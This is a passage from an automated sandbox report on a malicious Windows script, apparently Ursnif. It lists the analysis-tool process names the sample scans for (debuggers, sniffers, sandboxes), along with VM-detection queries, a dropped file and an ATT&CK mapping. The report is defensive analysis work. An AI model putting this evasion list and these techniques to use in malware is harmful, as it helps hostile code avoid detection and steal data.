            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXEP
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXEP/
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paymaster.cppJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 6984Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000002.00000002.240358405.0000029CC6F50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: paymaster.cpp.2.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000002.00000002.237337341.0000029CC1A49000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsSystem Information Discovery125SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet